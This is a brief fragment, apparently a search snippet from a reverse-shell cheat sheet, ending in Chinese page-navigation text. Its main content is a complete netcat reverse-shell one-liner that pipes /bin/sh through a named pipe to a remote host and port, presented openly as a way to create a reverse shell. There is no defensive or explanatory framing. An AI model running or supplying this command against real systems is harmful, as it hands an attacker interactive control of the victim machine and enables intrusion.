Your options for creating a reverse shell are limited by the scripting ... rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f ...
確定! 回上一頁